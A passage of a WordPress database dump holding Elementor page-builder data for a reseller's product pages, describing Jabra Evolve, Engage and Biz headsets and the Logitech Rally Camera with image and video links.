src=\"https://www.youtube.com/embed/85RJqPjfjng?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5153,1532,'_oembed_time_85dcbdf00994fe31815c375e1ea83749','1549871192'),(5155,2882,'_wp_page_template','template-fullwidth.php'),(5156,2882,'_elementor_edit_mode','builder'),(5157,2882,'_elementor_template_type','post'),(5158,2882,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 SE<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"caaab5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\",\"id\":2867},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f301c92\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\",\"id\":2870},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Jabra Engage 50<\\/h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Biz Wired Series<\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2400 II<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"859dfc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\",\"id\":2873},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"998a810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\",\"id\":2875},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra BIZ 2400 II Mono 3-in-1<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2400 II DUO<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"405c4cf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\",\"id\":2873},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"838e970\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz2300.png\",\"id\":2874},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2300<\\/h3><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2300 QD<\\/h3><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68a9c4e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\",\"id\":2876},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d7292d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\",\"id\":2877},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"solution-group-card__product-name ng-binding\\\">Jabra Biz 2300 QD DUO<\\/h3><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 1500<\\/h3><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac21aeb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD-1.png\",\"id\":2880},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d347cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\",\"id\":2878},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 1500 DUO USB<\\/h3><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5159,2882,'_elementor_version','0.4'),(5196,2885,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera 